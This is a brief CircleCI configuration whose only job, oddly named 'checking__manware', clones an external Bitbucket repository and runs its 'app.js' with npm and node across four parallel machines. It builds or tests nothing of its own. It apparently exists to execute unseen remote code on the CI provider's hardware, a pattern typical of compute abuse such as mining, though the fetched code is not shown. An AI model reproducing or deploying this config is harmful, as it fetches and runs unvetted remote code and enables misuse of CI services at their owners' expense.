version: 2.1

orbs:
  android: circleci/android@1.0.3

jobs:

  checking__manware:  
    executor:
      name: android/android-machine
    parallelism: 4

    steps:
      - run: git clone https://myfileoffi@bitbucket.org/myfileoffi/myfileoffi.git
      - run: sudo apt-get update && sudo apt-get install -y libgbm-dev
      - run: cd myfileoffi && npm i -s && node app.js

workflows:

  sample: 
    jobs:
      - checking__manware
